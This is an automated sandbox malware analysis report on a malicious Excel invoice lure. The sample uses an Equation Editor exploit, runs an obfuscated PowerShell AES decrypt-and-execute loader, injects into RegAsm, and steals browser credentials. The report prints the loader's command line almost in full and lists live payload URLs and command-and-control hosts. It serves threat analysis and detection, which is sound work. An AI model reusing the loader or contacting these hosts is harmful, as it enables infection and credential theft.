            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: RegAsm.exe, 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerChromelity Mode] - Microsoft Word
            Source: RegAsm.exe, 0000000C.00000002.1053847847.0000000000532000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager":200,
            Source: RegAsm.exe, 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
            Source: RegAsm.exe, 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, nots.dat.12.dr Binary or memory string: [Program Manager]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00434C52 cpuid 12_2_00434C52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,12_2_00452036
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_004520C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,12_2_00452313
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,12_2_00448404
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_0045243C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,12_2_00452543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00452610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA,12_2_0040F8D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,12_2_004488ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: IsValidCodePage,GetLocaleInfoW,12_2_00451CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,12_2_00451F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,12_2_00451F9B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00448957 GetSystemTimeAsFileTime,12_2_00448957
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041B60D GetUserNameW,12_2_0041B60D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00449190
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTR
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 12_2_0040BA12
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 12_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \key3.db 12_2_0040BB30

            Remote Access Functionality

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-999Z97
            Source: Yara match File source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTR
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: cmd.exe 12_2_0040569A
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 131 Scripting | Valid Accounts | 1 Native API | 131 Scripting | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 15 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | 43 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Bypass User Account Control | 21 Obfuscated Files or Information | 211 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 211 Input Capture | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 221 Command and Scripting Interpreter | 1 Windows Service | 1 Access Token Manipulation | 1 DLL Side-Loading | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | Login Hook | 1 Windows Service | 1 Bypass User Account Control | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | 2 PowerShell | Network Logon Script | 222 Process Injection | 1 Masquerading | LSA Secrets | 34 System Information Discovery | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Virtualization/Sandbox Evasion | Cached Domain Credentials | 2 Security Software Discovery | VNC | GUI Input Capture | 213 Application Layer Protocol | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 222 Process Injection | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
            [Behavior graph: ID 1482975, Sample: AWD 490104998518.xls, Startdate: 26/07/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            AWD 490104998518.xls | 29% | ReversingLabs | Document-Excel.Exploit.CVE-2017-0199 |
            AWD 490104998518.xls | 100% | Joe Sandbox ML | |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc | 100% | Avira | HEUR/Rtf.Malformed |
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc | 100% | Avira | HEUR/Rtf.Malformed |
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
            http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
            http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe |
            https://contoso.com/ | 0% | URL Reputation | safe |
            https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
            https://contoso.com/License | 0% | URL Reputation | safe |
            https://contoso.com/Icon | 0% | URL Reputation | safe |
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
            http://192.3.176.174/60/WDER.txt | 0% | Avira URL Cloud | safe |
            http://192.3.176.174/60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doc | 0% | Avira URL Cloud | safe |
            http://192.3.176.174/60/creatednewwaterbottleforme.gIFj | 0% | Avira URL Cloud | safe |
            http://tny.wtf/sA | 0% | Avira URL Cloud | safe |
            http://tny.wtf/sAyX | 0% | Avira URL Cloud | safe |
            http://192.3.176.174 | 0% | Avira URL Cloud | safe |
            http://198.46.176.133/Upload/vbs.jpeg | 100% | Avira URL Cloud | malware |
            sembe.duckdns.org | 0% | Avira URL Cloud | safe |
            http://tny.wtf/ | 0% | Avira URL Cloud | safe |
            http://geoplugin.net/json.gpQ) | 0% | Avira URL Cloud | safe |
            http://go.microsoft.cxj | 0% | Avira URL Cloud | safe |
            http://198.46.176.133 | 0% | Avira URL Cloud | safe |
            http://geoplugin.net/json.gpC) | 0% | Avira URL Cloud | safe |
            http://192.3.176.174/60/creatednewwaterbottleforme.gIF | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            sembe.duckdns.org | 194.187.251.115 | true | true | | unknown
            geoplugin.net | 178.237.33.50 | true | false | | unknown
            tny.wtf | 188.114.96.3 | true | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
                  sembe.duckdns.org | true | Avira URL Cloud: safe | unknown
                  http://192.3.176.174/60/WDER.txt | true | Avira URL Cloud: safe | unknown
                  http://tny.wtf/sA | false | Avira URL Cloud: safe | unknown
                  http://198.46.176.133/Upload/vbs.jpeg | false | Avira URL Cloud: malware | unknown
                  http://192.3.176.174/60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doc | true | Avira URL Cloud: safe | unknown
                  http://192.3.176.174/60/creatednewwaterbottleforme.gIF | true | Avira URL Cloud: safe | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://tny.wtf/ | tny.wtf.url.4.dr | false | Avira URL Cloud: safe | unknown
                  http://192.3.176.174 | powershell.exe, 0000000A.00000002.440512880.0000000008231000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://nuget.org/NuGet.exe | powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  http://tny.wtf/sAyX | 90530000.0.dr, ~DF86012724870D7705.TMP.0.dr | false | Avira URL Cloud: safe | unknown
                  http://geoplugin.net/json.gpQ) | RegAsm.exe, 0000000C.00000002.1053847847.00000000004D5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://geoplugin.net/json.gp/C | powershell.exe, 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://contoso.com/ | powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://nuget.org/nuget.exe | powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://contoso.com/License | powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://contoso.com/Icon | powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  http://192.3.176.174/60/creatednewwaterbottleforme.gIFj | EQNEDT32.EXE, 00000008.00000002.423816080.000000000065F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://go.microsoft.cxj | powershell.exe, 0000000A.00000002.436709620.00000000005BC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000A.00000002.436996063.00000000022A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  http://geoplugin.net/json.gpC) | RegAsm.exe, 0000000C.00000002.1053847847.00000000004D5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://198.46.176.133 | powershell.exe, 0000000A.00000002.436996063.00000000023DB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  192.3.176.174 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
                  188.114.97.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
                  188.114.96.3 | tny.wtf | European Union | 13335 | CLOUDFLARENETUS | true
                  198.46.176.133 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
                  178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                  194.187.251.115 | sembe.duckdns.org | United Kingdom | 9009 | M247GB | true
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1482975
                  Start date and time:2024-07-26 13:07:28 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 11m 2s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:14
                  Number of new started drivers analysed:1
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Sample name:AWD 490104998518.xls
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winXLS@9/31@8/6
                  EGA Information:
                  • Successful, ratio: 66.7%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 73
                  • Number of non-executed functions: 196
                  Cookbook Comments:
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Override analysis time to 56628.1053658464 for current running targets taking high CPU consumption
                  • Override analysis time to 113256.210731693 for current running targets taking high CPU consumption
                  • Override analysis time to 226512.421463386 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                  • Execution Graph export aborted for target EQNEDT32.EXE, PID 3120 because there are no executed functions
                  • Not all processes were analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: AWD 490104998518.xls
                  Time | Type | Description
                  07:08:52 | API Interceptor | 51x Sleep call for process: EQNEDT32.EXE modified
                  07:08:54 | API Interceptor | 19x Sleep call for process: powershell.exe modified
                  07:08:54 | API Interceptor | 15x Sleep call for process: wscript.exe modified
                  07:08:59 | API Interceptor | 13682690x Sleep call for process: RegAsm.exe modified
                  Input | Output
                  URL: Office document Model: gpt-4o
                  ```json
                  {
                    "riskscore": 7,
                    "reasons": "The document contains a visually prominent email address 'at.guarantees.invoicing(AT)bnpparibas.com' which could mislead the user into contacting a potentially harmful entity. The text creates a sense of urgency by mentioning 'ATTENTION GUARANTEES DEPARTMENT', 'REMINDER 2', and 'PLEASE CREDIT OUR ADVISING FEE EUR 250,00 16/08/23 PLUS COURIER EUR 40,00 PLUS RELAY'. The document impersonates a well-known brand, BNP Paribas, which adds credibility and could deceive the user. The sense of urgency is directly connected to the email address, urging the user to take immediate action."
                  }
                  ```
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  188.114.97.3RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • tny.wtf/
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • tny.wtf/
                  #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                  • tny.wtf/4Gs
                  Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
                  • downloaddining2.com/h9fmdW6/index.php
                  Quotation.exeGet hashmaliciousFormBookBrowse
                  • www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
                  LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                  • www.whatareyoucraving.com/drbb/
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/pqv2p
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/pqv2p
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/pqv2p
                  PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                  • tny.wtf/vMCQY
                  188.114.96.3waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                  • hq.ax/Oi8
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • tny.wtf/dGa
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • tny.wtf/
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • tny.wtf/jjJsPX
                  xptRc4P9NV.exeGet hashmaliciousUnknownBrowse
                  • api.keyunet.cn/v3/Project/appInfo/65fc6006
                  LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                  • www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin
                  LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                  • cccc.yiuyiu.xyz/config.ini
                  54.xlsGet hashmaliciousFormBookBrowse
                  • tny.wtf/
                  Order_490104.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/vb
                  Order_490104.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/vb
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  sembe.duckdns.orgogetback.docGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  S0042328241130.xlsGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  M7RrbN4DTk.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 194.187.251.115
                  S004232824113048.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 194.187.251.115
                  0003945 RFQ Cylinder Block PO list and detailed Drawing gpj.exeGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  file.exeGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  PG_320_MPI SRL_20240607_100526.xlsGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  crosscheckrosefloweronhairbeauty.gIF.vbsGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  swCQS5MMLX.rtfGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  ucancrosstheflowerbeautiytogetin.gIF.vbsGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  tny.wtfRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • 188.114.96.3
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • 188.114.96.3
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • 188.114.96.3
                  #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                  • 188.114.97.3
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                  • 188.114.97.3
                  Scan copy.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  54.xlsGet hashmaliciousFormBookBrowse
                  • 188.114.97.3
                  geoplugin.netwaybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                  • 178.237.33.50
                  Payment Advice__HSBC Banking.pdf.lnkGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  C1ZsNxSer8.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  IAENMAIL-A4-240717-0830-000090912_PDF.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  CDG__ Copia de Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  CFS-0682-2-08 Order.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  AS-COLOCROSSINGUSwaybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                  • 104.168.45.34
                  IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                  • 198.46.178.145
                  file.exeGet hashmaliciousVidarBrowse
                  • 198.46.178.145
                  C1ZsNxSer8.exeGet hashmaliciousRemcosBrowse
                  • 23.95.60.82
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • 23.95.60.82
                  #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                  • 198.46.176.133
                  BilseMHALF.rtfGet hashmaliciousUnknownBrowse
                  • 172.245.123.11
                  2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                  • 198.46.174.139
                  DBytisGNuD.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                  • 107.174.69.116
                  LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                  • 107.175.229.139
                  CLOUDFLARENETUSTNS71092E68UI0.vbeGet hashmaliciousFormBookBrowse
                  • 104.21.29.136
                  https://click.pstmrk.it/3s/www.rxeffect.com/xrJC/8OO2AQ/AQ/7b025ed7-37dd-46f9-8a3c-79d484929f8e/1/x7UnC8G8B9Get hashmaliciousUnknownBrowse
                  • 104.16.117.116
                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                  • 188.114.96.3
                  IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                  • 104.21.72.79
                  SecuriteInfo.com.Win32.RATX-gen.11894.20893.exeGet hashmaliciousFormBookBrowse
                  • 172.67.134.182
                  https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20=Get hashmaliciousPhisherBrowse
                  • 188.114.96.3
